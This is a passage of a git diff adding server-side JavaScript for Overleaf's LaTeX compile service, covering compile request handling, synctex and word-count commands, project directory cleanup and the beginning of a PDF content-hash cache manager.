Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let commandRunnerPath +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') + +if ((Settings.clsi != null ? Settings.clsi.dockerRunner : undefined) === true) { + commandRunnerPath = './DockerRunner' +} else { + commandRunnerPath = './LocalCommandRunner' +} +logger.debug({ commandRunnerPath }, 'selecting command runner for clsi') +const CommandRunner = require(commandRunnerPath) + +module.exports = CommandRunner diff --git a/services/clsi/app/js/CompileController.js b/services/clsi/app/js/CompileController.js new file mode 100644 index 0000000..87a7db6 --- /dev/null +++ b/services/clsi/app/js/CompileController.js @@ -0,0 +1,276 @@ +const Path = require('node:path') +const RequestParser = require('./RequestParser') +const CompileManager = require('./CompileManager') +const Settings = require('@overleaf/settings') +const Metrics = require('./Metrics') +const ProjectPersistenceManager = require('./ProjectPersistenceManager') +const logger = require('@overleaf/logger') +const Errors = require('./Errors') +const { notifyCLSICacheAboutBuild } = require('./CLSICacheHandler') + +let lastSuccessfulCompileTimestamp = 0 + +function timeSinceLastSuccessfulCompile() { + return Date.now() - lastSuccessfulCompileTimestamp +} + +function compile(req, res, next) { + const timer = new Metrics.Timer('compile-request') + RequestParser.parse(req.body, function (error, request) { + if (error) { + return next(error) + } + timer.opts = request.metricsOpts + request.project_id = req.params.project_id + if (req.params.user_id != null) { + request.user_id = req.params.user_id + } + ProjectPersistenceManager.markProjectAsJustAccessed( + request.project_id, + function (error) { + if (error) { + return next(error) + } + const stats = {} + const timings = {} + CompileManager.doCompileWithLock( + request, + stats, + timings, + (error, result) => { + let { buildId, outputFiles } = result || {} + let code, status + if (outputFiles == null) { + outputFiles = [] + } + if (error instanceof Errors.AlreadyCompilingError) { + code = 423 // Http 423 Locked + status = 'compile-in-progress' + } else if (error instanceof Errors.FilesOutOfSyncError) { + code = 409 // Http 409 Conflict + status = 'retry' + logger.warn( + { + projectId: request.project_id, + userId: request.user_id, + }, + 'files out of sync, please retry' + ) + } else if ( + error?.code === 'EPIPE' || + error instanceof Errors.TooManyCompileRequestsError + ) { + // docker returns EPIPE when shutting down + code = 503 // send 503 Unavailable response + status = 'unavailable' + } else if (error?.terminated) { + status = 'terminated' + } else if (error?.validate) { + status = `validation-${error.validate}` + } else if (error?.timedout) { + status = 'timedout' + logger.debug( + { err: error, projectId: request.project_id }, + 'timeout running compile' + ) + } else if (error) { + status = 'error' + code = 500 + logger.error( + { err: error, projectId: request.project_id }, + 'error running compile' + ) + } else { + if ( + outputFiles.some( + file => file.path === 'output.pdf' && file.size > 0 + ) + ) { + status = 'success' + lastSuccessfulCompileTimestamp = Date.now() + } else if (request.stopOnFirstError) { + status = 'stopped-on-first-error' + } else { + status = 'failure' + logger.warn( + { projectId: request.project_id, outputFiles }, + 'project failed to compile successfully, no output.pdf generated' + ) + } + + // log an error if any core files are found + if (outputFiles.some(file => file.path === 'core')) { + logger.error( + { projectId: request.project_id, req, outputFiles }, + 'core file found in output' + ) + } + } + + if (error) { + outputFiles = error.outputFiles || [] + buildId = error.buildId + } + + if ( + status === 'success' && + request.editorId && + request.populateClsiCache + ) { + notifyCLSICacheAboutBuild({ + projectId: request.project_id, + userId: request.user_id, + buildId: outputFiles[0].build, + editorId: request.editorId, + outputFiles, + compileGroup: request.compileGroup, + options: { + compiler: request.compiler, + draft: request.draft, + imageName: request.imageName + ? Path.basename(request.imageName) + : undefined, + rootResourcePath: request.rootResourcePath, + stopOnFirstError: request.stopOnFirstError, + }, + }) + } + + timer.done() + res.status(code || 200).send({ + compile: { + status, + error: error?.message || error, + stats, + timings, + buildId, + outputUrlPrefix: Settings.apis.clsi.outputUrlPrefix, + outputFiles: outputFiles.map(file => ({ + url: + `${Settings.apis.clsi.url}/project/${request.project_id}` + + (request.user_id != null + ? `/user/${request.user_id}` + : '') + + `/build/${file.build}/output/${file.path}`, + ...file, + })), + }, + }) + } + ) + } + ) + }) +} + +function stopCompile(req, res, next) { + const { project_id: projectId, user_id: userId } = req.params + CompileManager.stopCompile(projectId, userId, function (error) { + if (error) { + return next(error) + } + res.sendStatus(204) + }) +} + +function clearCache(req, res, next) { + ProjectPersistenceManager.clearProject( + req.params.project_id, + req.params.user_id, + function (error) { + if (error) { + return next(error) + } + // No content + res.sendStatus(204) + } + ) +} + +function syncFromCode(req, res, next) { + const { file, editorId, buildId, compileFromClsiCache } = req.query + const line = parseInt(req.query.line, 10) + const column = parseInt(req.query.column, 10) + const { imageName } = req.query + const projectId = req.params.project_id + const userId = req.params.user_id + CompileManager.syncFromCode( + projectId, + userId, + file, + line, + column, + { imageName, editorId, buildId, compileFromClsiCache }, + function (error, pdfPositions) { + if (error) { + return next(error) + } + res.json({ + pdf: pdfPositions, + }) + } + ) +} + +function syncFromPdf(req, res, next) { + const page = parseInt(req.query.page, 10) + const h = parseFloat(req.query.h) + const v = parseFloat(req.query.v) + const { imageName, editorId, buildId, compileFromClsiCache } = req.query + const projectId = req.params.project_id + const userId = req.params.user_id + CompileManager.syncFromPdf( + projectId, + userId, + page, + h, + v, + { imageName, editorId, buildId, compileFromClsiCache }, + function (error, codePositions) { + if (error) { + return next(error) + } + res.json({ + code: codePositions, + }) + } + ) +} + +function wordcount(req, res, next) { + const file = req.query.file || 'main.tex' + const projectId = req.params.project_id + const userId = req.params.user_id + const { image } = req.query + logger.debug({ image, file, projectId }, 'word count request') + + CompileManager.wordcount( + projectId, + userId, + file, + image, + function (error, result) { + if (error) { + return next(error) + } + res.json({ + texcount: result, + }) + } + ) +} + +function status(req, res, next) { + res.send('OK') +} + +module.exports = { + compile, + stopCompile, + clearCache, + syncFromCode, + syncFromPdf, + wordcount, + status, + timeSinceLastSuccessfulCompile, +} diff --git a/services/clsi/app/js/CompileManager.js b/services/clsi/app/js/CompileManager.js new file mode 100644 index 0000000..b65fb3c --- /dev/null +++ b/services/clsi/app/js/CompileManager.js @@ -0,0 +1,701 @@ +const fsPromises = require('node:fs/promises') +const os = require('node:os') +const Path = require('node:path') +const { callbackify } = require('node:util') + +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') + +const ResourceWriter = require('./ResourceWriter') +const LatexRunner = require('./LatexRunner') +const OutputFileFinder = require('./OutputFileFinder') +const OutputCacheManager = require('./OutputCacheManager') +const Metrics = require('./Metrics') +const DraftModeManager = require('./DraftModeManager') +const TikzManager = require('./TikzManager') +const LockManager = require('./LockManager') +const Errors = require('./Errors') +const CommandRunner = require('./CommandRunner') +const { emitPdfStats } = require('./ContentCacheMetrics') +const SynctexOutputParser = require('./SynctexOutputParser') +const { + downloadLatestCompileCache, + downloadOutputDotSynctexFromCompileCache, +} = require('./CLSICacheHandler') + +const COMPILE_TIME_BUCKETS = [ + // NOTE: These buckets are locked in per metric name. + // If you want to change them, you will need to rename metrics. + 0, 1, 2, 3, 4, 6, 8, 11, 15, 22, 31, 43, 61, 86, 121, 170, 240, +].map(seconds => seconds * 1000) + +function getCompileName(projectId, userId) { + if (userId != null) { + return `${projectId}-${userId}` + } else { + return projectId + } +} + +function getCompileDir(projectId, userId) { + return Path.join(Settings.path.compilesDir, getCompileName(projectId, userId)) +} + +function getOutputDir(projectId, userId) { + return Path.join(Settings.path.outputDir, getCompileName(projectId, userId)) +} + +async function doCompileWithLock(request, stats, timings) { + const compileDir = getCompileDir(request.project_id, request.user_id) + request.isInitialCompile = + (await fsPromises.mkdir(compileDir, { recursive: true })) === compileDir + // prevent simultaneous compiles + const lock = LockManager.acquire(compileDir) + try { + return await doCompile(request, stats, timings) + } finally { + lock.release() + } +} + +async function doCompile(request, stats, timings) { + const { project_id: projectId, user_id: userId } = request + const compileDir = getCompileDir(request.project_id, request.user_id) + + const timerE2E = new Metrics.Timer( + 'compile-e2e-v2', + 1, + request.metricsOpts, + COMPILE_TIME_BUCKETS + ) + if (request.isInitialCompile) { + stats.isInitialCompile = 1 + request.metricsOpts.compile = 'initial' + if (request.compileFromClsiCache) { + try { + if (await downloadLatestCompileCache(projectId, userId, compileDir)) { + stats.restoredClsiCache = 1 + request.metricsOpts.compile = 'from-clsi-cache' + } + } catch (err) { + logger.warn( + { err, projectId, userId }, + 'failed to populate compile dir from cache' + ) + } + } + } else { + request.metricsOpts.compile = 'recompile' + } + const writeToDiskTimer = new Metrics.Timer( + 'write-to-disk', + 1, + request.metricsOpts + ) + logger.debug( + { projectId: request.project_id, userId: request.user_id }, + 'syncing resources to disk' + ) + + let resourceList + try { + // NOTE: resourceList is insecure, it should only be used to exclude files from the output list + resourceList = await ResourceWriter.promises.syncResourcesToDisk( + request, + compileDir + ) + } catch (error) { + if (error instanceof Errors.FilesOutOfSyncError) { + OError.tag(error, 'files out of sync, please retry', { + projectId: request.project_id, + userId: request.user_id, + }) + } else { + OError.tag(error, 'error writing resources to disk', { + projectId: request.project_id, + userId: request.user_id, + }) + } + throw error + } + logger.debug( + { + projectId: request.project_id, + userId: request.user_id, + timeTaken: Date.now() - writeToDiskTimer.start, + }, + 'written files to disk' + ) + timings.sync = writeToDiskTimer.done() + + // set up environment variables for chktex + const env = { + OVERLEAF_PROJECT_ID: request.project_id, + } + if (Settings.texliveOpenoutAny && Settings.texliveOpenoutAny !== '') { + // override default texlive openout_any environment variable + env.openout_any = Settings.texliveOpenoutAny + } + if (Settings.texliveMaxPrintLine && Settings.texliveMaxPrintLine !== '') { + // override default texlive max_print_line environment variable + env.max_print_line = Settings.texliveMaxPrintLine + } + // only run chktex on LaTeX files (not knitr .Rtex files or any others) + const isLaTeXFile = request.rootResourcePath?.match(/\.tex$/i) + if (request.check != null && isLaTeXFile) { + env.CHKTEX_OPTIONS = '-nall -e9 -e10 -w15 -w16' + env.CHKTEX_ULIMIT_OPTIONS = '-t 5 -v 64000' + if (request.check === 'error') { + env.CHKTEX_EXIT_ON_ERROR = 1 + } + if (request.check === 'validate') { + env.CHKTEX_VALIDATE = 1 + } + } + + // apply a series of file modifications/creations for draft mode and tikz + if (request.draft) { + await DraftModeManager.promises.injectDraftMode( + Path.join(compileDir, request.rootResourcePath) + ) + } + + const needsMainFile = await TikzManager.promises.checkMainFile( + compileDir, + request.rootResourcePath, + resourceList + ) + if (needsMainFile) { + await TikzManager.promises.injectOutputFile( + compileDir, + request.rootResourcePath + ) + } + + const compileTimer = new Metrics.Timer('run-compile', 1, request.metricsOpts) + // find the image tag to log it as a metric, e.g. 2015.1 (convert . to - for graphite) + let tag = 'default' + if (request.imageName != null) { + const match = request.imageName.match(/:(.*)/) + if (match != null) { + tag = match[1].replace(/\./g, '-') + } + } + // exclude smoke test + if (!request.project_id.match(/^[0-9a-f]{24}$/)) { + tag = 'other' + } + Metrics.inc('compiles', 1, request.metricsOpts) + Metrics.inc(`compiles-with-image.${tag}`, 1, request.metricsOpts) + const compileName = getCompileName(request.project_id, request.user_id) + + try { + await LatexRunner.promises.runLatex(compileName, { + directory: compileDir, + mainFile: request.rootResourcePath, + compiler: request.compiler, + timeout: request.timeout, + image: request.imageName, + flags: request.flags, + environment: env, + compileGroup: request.compileGroup, + stopOnFirstError: request.stopOnFirstError, + stats, + timings, + }) + + // We use errors to return the validation state. It would be nice to use a + // more appropriate mechanism. + if (request.check === 'validate') { + const validationError = new Error('validation') + validationError.validate = 'pass' + throw validationError + } + } catch (originalError) { + let error = originalError + // request was for validation only + if (request.check === 'validate' && !error.validate) { + error = new Error('validation') + error.validate = originalError.code ? 'fail' : 'pass' + } + + // request was for compile, and failed on validation + if (request.check === 'error' && originalError.message === 'exited') { + error = new Error('compilation') + error.validate = 'fail' + } + + // record timeout errors as a separate counter, success is recorded later + if (error.timedout) { + Metrics.inc('compiles-timeout', 1, request.metricsOpts) + } + + const { outputFiles, allEntries, buildId } = await _saveOutputFiles({ + request, + compileDir, + resourceList, + stats, + timings, + }) + error.outputFiles = outputFiles // return output files so user can check logs + error.buildId = buildId + // Clear project if this compile was abruptly terminated + if (error.terminated || error.timedout) { + await clearProjectWithListing( + request.project_id, + request.user_id, + allEntries + ) + } + + throw error + } + + // compile completed normally + Metrics.inc('compiles-succeeded', 1, request.metricsOpts) + for (const metricKey in stats) { + const metricValue = stats[metricKey] + Metrics.count(metricKey, metricValue, 1, request.metricsOpts) + } + for (const metricKey in timings) { + const metricValue = timings[metricKey] + Metrics.timing(metricKey, metricValue, 1, request.metricsOpts) + } + const loadavg = typeof os.loadavg === 'function' ? os.loadavg() : undefined + if (loadavg != null) { + Metrics.gauge('load-avg', loadavg[0]) + } + const ts = compileTimer.done() + logger.debug( + { + projectId: request.project_id, + userId: request.user_id, + timeTaken: ts, + stats, + timings, + loadavg, + }, + 'done compile' + ) + if (stats['latex-runs'] > 0) { + Metrics.histogram( + 'avg-compile-per-pass-v2', + ts / stats['latex-runs'], + COMPILE_TIME_BUCKETS, + request.metricsOpts + ) + Metrics.timing( + 'avg-compile-per-pass-v2', + ts / stats['latex-runs'], + 1, + request.metricsOpts + ) + } + if (stats['latex-runs'] > 0 && timings['cpu-time'] > 0) { + Metrics.timing( + 'run-compile-cpu-time-per-pass', + timings['cpu-time'] / stats['latex-runs'], + 1, + request.metricsOpts + ) + } + // Emit compile time. + timings.compile = ts + + const { outputFiles, buildId } = await _saveOutputFiles({ + request, + compileDir, + resourceList, + stats, + timings, + }) + + // Emit e2e compile time. + timings.compileE2E = timerE2E.done() + Metrics.timing('compile-e2e-v2', timings.compileE2E, 1, request.metricsOpts) + + if (stats['pdf-size']) { + emitPdfStats(stats, timings, request) + } + + return { outputFiles, buildId } +} + +async function _saveOutputFiles({ + request, + compileDir, + resourceList, + stats, + timings, +}) { + const timer = new Metrics.Timer( + 'process-output-files', + 1, + request.metricsOpts + ) + const outputDir = getOutputDir(request.project_id, request.user_id) + + const { outputFiles: rawOutputFiles, allEntries } = + await OutputFileFinder.promises.findOutputFiles(resourceList, compileDir) + + const { buildId, outputFiles } = + await OutputCacheManager.promises.saveOutputFiles( + { request, stats, timings }, + rawOutputFiles, + compileDir, + outputDir + ) + + timings.output = timer.done() + return { outputFiles, allEntries, buildId } +} + +async function stopCompile(projectId, userId) { + const compileName = getCompileName(projectId, userId) + await LatexRunner.promises.killLatex(compileName) +} + +async function clearProject(projectId, userId) { + const compileDir = getCompileDir(projectId, userId) + await fsPromises.rm(compileDir, { force: true, recursive: true }) +} + +async function clearProjectWithListing(projectId, userId, allEntries) { + const compileDir = getCompileDir(projectId, userId) + + const exists = await _checkDirectory(compileDir) + if (!exists) { + // skip removal if no directory present + return + } + + for (const pathInProject of allEntries) { + const path = Path.join(compileDir, pathInProject) + if (path.endsWith('/')) { + await fsPromises.rmdir(path) + } else { + await fsPromises.unlink(path) + } + } + await fsPromises.rmdir(compileDir) +} + +async function _findAllDirs() { + const root = Settings.path.compilesDir + const files = await fsPromises.readdir(root) + const allDirs = files.map(file => Path.join(root, file)) + return allDirs +} + +async function clearExpiredProjects(maxCacheAgeMs) { + const now = Date.now() + const dirs = await _findAllDirs() + for (const dir of dirs) { + let stats + try { + stats = await fsPromises.stat(dir) + } catch (err) { + // ignore errors checking directory + continue + } + + const age = now - stats.mtime + const hasExpired = age > maxCacheAgeMs + if (hasExpired) { + await fsPromises.rm(dir, { force: true, recursive: true }) + } + } +} + +async function _checkDirectory(compileDir) { + let stats + try { + stats = await fsPromises.lstat(compileDir) + } catch (err) { + if (err.code === 'ENOENT') { + // directory does not exist + return false + } + OError.tag(err, 'error on stat of project directory for removal', { + dir: compileDir, + }) + throw err + } + if (!stats.isDirectory()) { + throw new OError('project directory is not directory', { + dir: compileDir, + stats, + }) + } + return true +} + +async function syncFromCode(projectId, userId, filename, line, column, opts) { + // If LaTeX was run in a virtual environment, the file path that synctex expects + // might not match the file path on the host. The .synctex.gz file however, will be accessed + // wherever it is on the host. + const compileName = getCompileName(projectId, userId) + const baseDir = Settings.path.synctexBaseDir(compileName) + const inputFilePath = Path.join(baseDir, filename) + const outputFilePath = Path.join(baseDir, 'output.pdf') + const command = [ + 'synctex', + 'view', + '-i', + `${line}:${column}:${inputFilePath}`, + '-o', + outputFilePath, + ] + const stdout = await _runSynctex(projectId, userId, command, opts) + logger.debug( + { projectId, userId, filename, line, column, command, stdout }, + 'synctex code output' + ) + return SynctexOutputParser.parseViewOutput(stdout) +} + +async function syncFromPdf(projectId, userId, page, h, v, opts) { + const compileName = getCompileName(projectId, userId) + const baseDir = Settings.path.synctexBaseDir(compileName) + const outputFilePath = `${baseDir}/output.pdf` + const command = [ + 'synctex', + 'edit', + '-o', + `${page}:${h}:${v}:${outputFilePath}`, + ] + const stdout = await _runSynctex(projectId, userId, command, opts) + logger.debug({ projectId, userId, page, h, v, stdout }, 'synctex pdf output') + return SynctexOutputParser.parseEditOutput(stdout, baseDir) +} + +async function _checkFileExists(dir, filename) { + try { + await fsPromises.stat(dir) + } catch (error) { + if (error.code === 'ENOENT') { + throw new Errors.NotFoundError('no output directory') + } + throw error + } + + const file = Path.join(dir, filename) + let stats + try { + stats = await fsPromises.stat(file) + } catch (error) { + if (error.code === 'ENOENT') { + throw new Errors.NotFoundError('no output file') + } + } + if (!stats.isFile()) { + throw new Error('not a file') + } +} + +async function _runSynctex(projectId, userId, command, opts) { + const { imageName, editorId, buildId, compileFromClsiCache } = opts + + if (imageName && !_isImageNameAllowed(imageName)) { + throw new Errors.InvalidParameter('invalid image') + } + if (editorId && !/^[a-f0-9-]+$/.test(editorId)) { + throw new Errors.InvalidParameter('invalid editorId') + } + if (buildId && !OutputCacheManager.BUILD_REGEX.test(buildId)) { + throw new Errors.InvalidParameter('invalid buildId') + } + + const outputDir = getOutputDir(projectId, userId) + const runInOutputDir = buildId && CommandRunner.canRunSyncTeXInOutputDir() + + const directory = runInOutputDir + ? Path.join(outputDir, OutputCacheManager.CACHE_SUBDIR, buildId) + : getCompileDir(projectId, userId) + const timeout = 60 * 1000 // increased to allow for large projects + const compileName = getCompileName(projectId, userId) + const compileGroup = runInOutputDir ? 'synctex-output' : 'synctex' + const defaultImageName = + Settings.clsi && Settings.clsi.docker && Settings.clsi.docker.image + // eslint-disable-next-line @typescript-eslint/return-await + return await OutputCacheManager.promises.queueDirOperation( + outputDir, + /** + * @return {Promise} + */ + async () => { + try { + await _checkFileExists(directory, 'output.synctex.gz') + } catch (err) { + if ( + err instanceof Errors.NotFoundError && + compileFromClsiCache && + editorId && + buildId + ) { + try { + await downloadOutputDotSynctexFromCompileCache( + projectId, + userId, + editorId, + buildId, + directory + ) + } catch (err) { + logger.warn( + { err, projectId, userId, editorId, buildId }, + 'failed to download output.synctex.gz from clsi-cache' + ) + } + await _checkFileExists(directory, 'output.synctex.gz') + } else { + throw err + } + } + try { + const output = await CommandRunner.promises.run( + compileName, + command, + directory, + imageName || defaultImageName, + timeout, + {}, + compileGroup + ) + return output.stdout + } catch (error) { + throw OError.tag(error, 'error running synctex', { + command, + projectId, + userId, + }) + } + } + ) +} + +async function wordcount(projectId, userId, filename, image) { + logger.debug({ projectId, userId, filename, image }, 'running wordcount') + const filePath = `$COMPILE_DIR/${filename}` + const command = ['texcount', '-nocol', '-inc', filePath] + const compileDir = getCompileDir(projectId, userId) + const timeout = 60 * 1000 + const compileName = getCompileName(projectId, userId) + const compileGroup = 'wordcount' + + if (image && !_isImageNameAllowed(image)) { + throw new Errors.InvalidParameter('invalid image') + } + + try { + await fsPromises.mkdir(compileDir, { recursive: true }) + } catch (err) { + throw OError.tag(err, 'error ensuring dir for wordcount', { + projectId, + userId, + filename, + }) + } + + try { + const { stdout } = await CommandRunner.promises.run( + compileName, + command, + compileDir, + image, + timeout, + {}, + compileGroup + ) + const results = _parseWordcountFromOutput(stdout) + logger.debug( + { projectId, userId, wordcount: results }, + 'word count results' + ) + return results + } catch (err) { + throw OError.tag(err, 'error reading word count output', { + command, + compileDir, + projectId, + userId, + }) + } +} + +function _parseWordcountFromOutput(output) { + const results = { + encode: '', + textWords: 0, + headWords: 0, + outside: 0, + headers: 0, + elements: 0, + mathInline: 0, + mathDisplay: 0, + errors: 0, + messages: '', + } + for (const line of output.split('\n')) { + const [data, info] = line.split(':') + if (data.indexOf('Encoding') > -1) { + results.encode = info.trim() + } + if (data.indexOf('in text') > -1) { + results.textWords = parseInt(info, 10) + } + if (data.indexOf('in head') > -1) { + results.headWords = parseInt(info, 10) + } + if (data.indexOf('outside') > -1) { + results.outside = parseInt(info, 10) + } + if (data.indexOf('of head') > -1) { + results.headers = parseInt(info, 10) + } + if (data.indexOf('Number of floats/tables/figures') > -1) { + results.elements = parseInt(info, 10) + } + if (data.indexOf('Number of math inlines') > -1) { + results.mathInline = parseInt(info, 10) + } + if (data.indexOf('Number of math displayed') > -1) { + results.mathDisplay = parseInt(info, 10) + } + if (data === '(errors') { + // errors reported as (errors:123) + results.errors = parseInt(info, 10) + } + if (line.indexOf('!!! ') > -1) { + // errors logged as !!! message !!! + results.messages += line + '\n' + } + } + return results +} + +function _isImageNameAllowed(imageName) { + const ALLOWED_IMAGES = + Settings.clsi && Settings.clsi.docker && Settings.clsi.docker.allowedImages + return !ALLOWED_IMAGES || ALLOWED_IMAGES.includes(imageName) +} + +module.exports = { + doCompileWithLock: callbackify(doCompileWithLock), + stopCompile: callbackify(stopCompile), + clearProject: callbackify(clearProject), + clearExpiredProjects: callbackify(clearExpiredProjects), + syncFromCode: callbackify(syncFromCode), + syncFromPdf: callbackify(syncFromPdf), + wordcount: callbackify(wordcount), + promises: { + doCompileWithLock, + stopCompile, + clearProject, + clearExpiredProjects, + syncFromCode, + syncFromPdf, + wordcount, + }, +} diff --git a/services/clsi/app/js/ContentCacheManager.js b/services/clsi/app/js/ContentCacheManager.js new file mode 100644 index 0000000..5457c0d --- /dev/null +++ b/services/clsi/app/js/ContentCacheManager.js @@ -0,0 +1,441 @@ +/** + * ContentCacheManager - maintains a cache of stream hashes from a PDF file + */ + +const { callbackify } = require('node:util') +const fs = require('node:fs') +const crypto = require('node:crypto') +const Path = require('node:path') +const Settings = require('@overleaf/settings') +const OError = require('@overleaf/o-error') +const pLimit = require('p-limit') +const { parseXrefTable } = require('./XrefParser') +const { + QueueLimitReachedError, + TimedOutError, + NoXrefTableError, +} = require('./Errors') +const workerpool = require('workerpool') +const Metrics = require('@overleaf/metrics') + +/** + * @type {import('workerpool').WorkerPool} + */ +let WORKER_POOL +// NOTE: Check for main thread to avoid recursive start of pool. +if (Settings.pdfCachingEnableWorkerPool && workerpool.isMainThread) { + WORKER_POOL = workerpool.pool(Path.join(__dirname, 'ContentCacheWorker.js'), { + // Cap number of worker threads. + maxWorkers: Settings.pdfCachingWorkerPoolSize, + // Warmup workers. + minWorkers: Settings.pdfCachingWorkerPoolSize, + // Limit queue back-log + maxQueueSize: Settings.pdfCachingWorkerPoolBackLogLimit, + }) + setInterval(() => { + const { + totalWorkers, + busyWorkers, + idleWorkers, + pendingTasks, + activeTasks, + } = WORKER_POOL.stats() + Metrics.gauge('pdf_caching_total_workers', totalWorkers) + Metrics.gauge('pdf_caching_busy_workers', busyWorkers) + Metrics.gauge('pdf_caching_idle_workers', idleWorkers) + Metrics.gauge('pdf_caching_pending_tasks', pendingTasks) + Metrics.gauge('pdf_caching_active_tasks', activeTasks) + }, 15 * 1000) +} + +/** + * + * @param {String} contentDir path to directory where content hash files are cached + * @param {String} filePath the pdf file to scan for streams + * @param {number} pdfSize the pdf size + * @param {number} pdfCachingMinChunkSize per request threshold + * @param {number} compileTime + */ +async function update({ + contentDir, + filePath, + pdfSize, + pdfCachingMinChunkSize, + compileTime, +}) { + if (pdfSize < pdfCachingMinChunkSize) { + return { + contentRanges: [], + newContentRanges: [], + reclaimedSpace: 0, + startXRefTable: undefined, + } + } + if (Settings.pdfCachingEnableWorkerPool) { + return await updateOtherEventLoop({ + contentDir, + filePath, + pdfSize, + pdfCachingMinChunkSize, + compileTime, + }) + } else { + return await updateSameEventLoop({ + contentDir, + filePath, + pdfSize, + pdfCachingMinChunkSize, + compileTime, + }) + } +} + +/** + * + * @param {String} contentDir path to directory where content hash files are cached + * @param {String} filePath the pdf file to scan for streams + * @param {number} pdfSize the pdf size + * @param {number} pdfCachingMinChunkSize per request threshold + * @param {number} compileTime + */ +async function updateOtherEventLoop({ + contentDir, + filePath, + pdfSize, + pdfCachingMinChunkSize, + compileTime, +}) { + const workerLatencyInMs = 100 + // Prefer getting the timeout error from the worker vs timing out the worker. + const timeout = getMaxOverhead(compileTime) + workerLatencyInMs + try { + return await WORKER_POOL.exec('updateSameEventLoop', [ + { + contentDir, + filePath, + pdfSize, + pdfCachingMinChunkSize, + compileTime, + }, + ]).timeout(timeout) + } catch (e) { + if (e instanceof workerpool.Promise.TimeoutError) { + throw new TimedOutError('context-lost-in-worker', { timeout }) + } + if (e.message?.includes?.('Max queue size of ')) { + throw new QueueLimitReachedError() + } + if (e.message?.includes?.('xref')) { + throw new NoXrefTableError(e.message) + } + throw e + } +} + +/** + * + * @param {String} contentDir path to directory where content hash files are cached + * @param {String} filePath the pdf file to scan for streams + * @param {number} pdfSize the pdf size + * @param {number} pdfCachingMinChunkSize per request threshold + * @param {number} compileTime + */ +async function updateSameEventLoop({ + contentDir, + filePath, + pdfSize, + pdfCachingMinChunkSize, + compileTime, +}) { + const checkDeadline = getDeadlineChecker(compileTime) + // keep track of hashes expire old ones when they reach a generation > N. + const tracker = await HashFileTracker.from(contentDir) + tracker.updateAge() + checkDeadline('after init HashFileTracker') + + const [reclaimedSpace, overheadDeleteStaleHashes] = + await tracker.deleteStaleHashes(5) + checkDeadline('after delete stale hashes') + + const { xRefEntries, startXRefTable } = await parseXrefTable( + filePath, + pdfSize + ) + + xRefEntries.sort((a, b) => { + return a.offset - b.offset + }) + xRefEntries.forEach((obj, idx) => { + obj.idx = idx + }) + + checkDeadline('after parsing') + + const uncompressedObjects = [] + for (const object of xRefEntries) { + if (!object.uncompressed) { + continue + } + const nextObject = xRefEntries[object.idx + 1] + if (!nextObject) { + // Ignore this possible edge case. + // The last object should be part of the xRef table. + continue + } else { + object.endOffset = nextObject.offset + } + const size = object.endOffset - object.offset + object.size = size + if (size < pdfCachingMinChunkSize) { + continue + } + uncompressedObjects.push({ object, idx: uncompressedObjects.length }) + } + + checkDeadline('after finding uncompressed') + + let timedOutErr = null + const contentRanges = [] + const newContentRanges = [] + const handle = await fs.promises.open(filePath) + try { + for (const { object, idx } of uncompressedObjects) { + let buffer = Buffer.alloc(object.size, 0) + const { bytesRead } = await handle.read( + buffer, + 0, + object.size, + object.offset + ) + checkDeadline('after read ' + idx) + if (bytesRead !== object.size) { + throw new OError('could not read full chunk', { + object, + bytesRead, + }) + } + const idxObj = buffer.indexOf('obj') + if (idxObj > 100) { + throw new OError('objectId is too large', { + object, + idxObj, + }) + } + const objectIdRaw = buffer.subarray(0, idxObj) + buffer = buffer.subarray(objectIdRaw.byteLength) + + const hash = pdfStreamHash(buffer) + checkDeadline('after hash ' + idx) + const range = { + objectId: objectIdRaw.toString(), + start: object.offset + objectIdRaw.byteLength, + end: object.endOffset, + hash, + } + + if (tracker.has(range.hash)) { + // Optimization: Skip writing of already seen hashes. + tracker.track(range) + contentRanges.push(range) + continue + } + + await writePdfStream(contentDir, hash, buffer) + tracker.track(range) + contentRanges.push(range) + newContentRanges.push(range) + checkDeadline('after write ' + idx) + } + } catch (err) { + if (err instanceof TimedOutError) { + // Let the frontend use ranges that were processed so far. + timedOutErr = err + } else { + throw err + } + } finally { + await handle.close() + + // Flush from both success and failure code path. This allows the next + // cycle to complete faster as it can use the already written ranges. + await tracker.flush() + } + return { + contentRanges, + newContentRanges, + reclaimedSpace, + startXRefTable, + overheadDeleteStaleHashes, + timedOutErr, + } +} + +function getStatePath(contentDir) { + return Path.join(contentDir, '.state.v0.json') +} + +class HashFileTracker { + constructor(contentDir, { hashAge = [], hashSize = [] }) { + this.contentDir = contentDir + this.hashAge = new Map(hashAge) + this.hashSize = new Map(hashSize) + } + + static async from(contentDir) { + const statePath = getStatePath(contentDir) + let state = {} + try { + const blob = await fs.promises.readFile(statePath) + state = JSON.parse(blob) + } catch (e) {} + return new HashFileTracker(contentDir, state) + } + + has(hash) { + return this.hashAge.has(hash) + } + + track(range) { + if (!this.hashSize.has(range.hash)) { + this.hashSize.set(range.hash, range.end - range.start) + } + this.hashAge.set(range.hash, 0) + } + + updateAge() { + for (const [hash, age] of this.hashAge) { + this.hashAge.set(hash, age + 1) + } + return this + } + + findStale(maxAge) { + const stale = [] + for (const [hash, age] of this.hashAge) { + if (age > maxAge) { + stale.push(hash) + } + } + return stale + } + + async flush() { + const statePath = getStatePath(this.contentDir) + const blob = JSON.stringify({ + hashAge: Array.from(this.hashAge.entries()), + hashSize: Array.from(this.hashSize.entries()), + }) + const atomicWrite = statePath + '~' + try { + await fs.promises.writeFile(atomicWrite, blob) + } catch (err) { + try { + await fs.promises.unlink(atomicWrite) + } catch (e) {} + throw err + } + try { + await fs.promises.rename(atomicWrite, statePath) + } catch (err) { + try { + await fs.promises.unlink(atomicWrite) + } catch (e) {} + throw err + } + } + + async deleteStaleHashes(n) { + const t0 = Date.now() + // delete any hash file older than N generations + const hashes = this.findStale(n) + + let reclaimedSpace = 0 + if (hashes.length === 0) { + return [reclaimedSpace, Date.now() - t0] + } + + await promiseMapWithLimit(10, hashes, async hash => { + try { + await fs.promises.unlink(Path.join(this.contentDir, hash)) + } catch (err) { + if (err?.code === 'ENOENT') { + // Ignore already deleted entries. The previous cleanup cycle may have + // been killed halfway through the deletion process, or before we + // flushed the state to disk. + } else { + throw err + } + } + this.hashAge.delete(hash) + reclaimedSpace += this.hashSize.get(hash) + this.hashSize.delete(hash) + }) + return [reclaimedSpace, Date.now() - t0] + } +} + +function pdfStreamHash(buffer) { + const hash = crypto.createHash('sha256') + hash.update(buffer) + return 